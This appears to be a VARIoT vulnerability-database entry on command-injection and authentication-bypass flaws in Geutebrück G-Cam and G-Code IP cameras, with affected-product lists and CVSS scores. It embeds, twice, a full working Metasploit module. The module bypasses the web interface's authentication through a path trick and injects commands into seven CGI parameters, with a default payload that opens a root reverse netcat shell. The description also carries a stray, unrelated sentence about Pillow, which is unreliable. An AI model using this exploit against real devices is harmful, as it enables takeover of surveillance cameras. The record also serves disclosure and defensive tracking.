VAR-202109-0597
Vulnerability from variot - Updated: 2025-01-30 21:21Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },
'Author' => [
'Titouan Lazard', # Of RandoriSec - Discovery
'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2021-33543'],
['CVE', '2021-33544'],
['CVE', '2021-33548'],
['CVE', '2021-33550'],
['CVE', '2021-33551'],
['CVE', '2021-33552'],
['CVE', '2021-33553'],
['CVE', '2021-33554'],
[ 'URL', 'http://geutebruck.com' ],
[ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
[ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
],
'DisclosureDate' => '2021-07-08',
'Privileged' => true,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Targets' => [
[
'CVE-2021-33544 - certmngr.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'createselfcert',
'local' => Rex::Text.rand_text_alphanumeric(10..16),
'country' => Rex::Text.rand_text_alphanumeric(2),
'state' => '$(PLACEHOLDER_CMD)',
'organization' => Rex::Text.rand_text_alphanumeric(10..16),
'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
'days' => Rex::Text.rand_text_numeric(2..4),
'type' => Rex::Text.rand_text_numeric(2..4)
},
'uri' => '/../uapi-cgi/certmngr.cgi'
}
],
[
'CVE-2021-33548 - factory.cgi', {
'http_method' => 'GET',
'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/factory.cgi'
}
],
[
'CVE-2021-33550 - language.cgi', {
'http_method' => 'GET',
'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/language.cgi'
}
],
[
'CVE-2021-33551 - oem.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'set',
'enable' => 'yes',
'environment.lang' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/oem.cgi'
}
],
[
'CVE-2021-33552 - simple_reclistjs.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'get',
'timekey' => Rex::Text.rand_text_numeric(2..4),
'date' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
}
],
[
'CVE-2021-33553 - testcmd.cgi', {
'http_method' => 'GET',
'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
'uri' => '/../uapi-cgi/testcmd.cgi'
}
],
[
'CVE-2021-33554 - tmpapp.cgi', {
'http_method' => 'GET',
'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/tmpapp.cgi'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
},
'Notes' => {
'Stability' => ['CRASH_SAFE'],
'Reliability' => ['REPEATABLE_SESSION'],
'SideEffects' => ['ARTIFACTS_ON_DISK']
}
)
)
end
def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end
unless res&.body && !res.body.empty?
print_error('Empty body in the response!')
return false
end
res_xml = res.get_xml_document
if res_xml.at('//firmware').nil?
print_error('Target did not respond with a XML document containing the "firmware" element!')
return false
end
raw_text = res_xml.at('//firmware').text
if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
else
print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
false
end
end
def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end
rex_version = Rex::Version.new(version)
vprint_status("Found Geutebruck version #{rex_version}")
if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit print_status("#{rhost}:#{rport} - Setting up request...")
method = target['http_method']
if method == 'GET'
http_method_vars = 'vars_get'
else
http_method_vars = 'vars_post'
end
http_vars = target['http_vars']
http_vars.each do |(k, v)|
if v.include? 'PLACEHOLDER_CMD'
http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
end
end
print_status("Sending CMD injection request to #{rhost}:#{rport}")
send_request_cgi(
{
'method' => method,
'uri' => target['uri'],
http_method_vars => http_vars
}
)
print_status('Exploit complete, you should get a shell as the root user!')
end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-0597",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2112",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2271",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ebc-2111",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2239",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2230",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2249",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ewpc-2270",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * firmware 1.12.13.2 1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* een-20xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* efd-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ethc-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-cam"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* eec-2xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "works with the above firmware s e2 series camera models encoders"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ebc-21xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-code"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "( multiple products )"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ewpc-22xx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33544"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2093"
}
],
"trust": 0.6
},
"cve": "CVE-2021-33544",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2021-33544",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2021-33544",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2021-002023",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-33544",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "info@cert.vde.com",
"id": "CVE-2021-33544",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2021-002023",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202107-2093",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2093"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33544"
},
{
"db": "NVD",
"id": "CVE-2021-33544"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n \u0027Description\u0027 =\u003e %q{\n This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n and exploits multiple authenticated arbitrary command execution vulnerabilities within\n the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n remote code execution as the root user. \n },\n\n \u0027Author\u0027 =\u003e [\n \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n ],\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027References\u0027 =\u003e [\n [\u0027CVE\u0027, \u00272021-33543\u0027],\n [\u0027CVE\u0027, \u00272021-33544\u0027],\n [\u0027CVE\u0027, \u00272021-33548\u0027],\n [\u0027CVE\u0027, \u00272021-33550\u0027],\n [\u0027CVE\u0027, \u00272021-33551\u0027],\n [\u0027CVE\u0027, \u00272021-33552\u0027],\n [\u0027CVE\u0027, \u00272021-33553\u0027],\n [\u0027CVE\u0027, \u00272021-33554\u0027],\n [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n ],\n \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n \u0027Privileged\u0027 =\u003e true,\n \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n \u0027Arch\u0027 =\u003e [ARCH_CMD],\n \u0027Targets\u0027 =\u003e [\n [\n \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33548 - factory.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33550 - language.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33551 - oem.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027set\u0027,\n \u0027enable\u0027 =\u003e \u0027yes\u0027,\n \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027get\u0027,\n \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n }\n ]\n ],\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n },\n \u0027Notes\u0027 =\u003e {\n \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n }\n )\n )\n end\n\n def firmware\n res = send_request_cgi(\n \u0027method\u0027 =\u003e \u0027GET\u0027,\n \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n )\n unless res\n print_error(\u0027Connection failed!\u0027)\n return false\n end\n\n unless res\u0026.body \u0026\u0026 !res.body.empty?\n print_error(\u0027Empty body in the response!\u0027)\n return false\n end\n\n res_xml = res.get_xml_document\n if res_xml.at(\u0027//firmware\u0027).nil?\n print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n return false\n end\n raw_text = res_xml.at(\u0027//firmware\u0027).text\n if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n else\n print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n false\n end\n end\n\n def check\n version = firmware\n if version == false\n return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n end\n\n rex_version = Rex::Version.new(version)\n vprint_status(\"Found Geutebruck version #{rex_version}\")\n if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def exploit\n print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n method = target[\u0027http_method\u0027]\n if method == \u0027GET\u0027\n http_method_vars = \u0027vars_get\u0027\n else\n http_method_vars = \u0027vars_post\u0027\n end\n\n http_vars = target[\u0027http_vars\u0027]\n http_vars.each do |(k, v)|\n if v.include? \u0027PLACEHOLDER_CMD\u0027\n http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n end\n end\n\n print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n send_request_cgi(\n {\n \u0027method\u0027 =\u003e method,\n \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n http_method_vars =\u003e http_vars\n }\n )\n 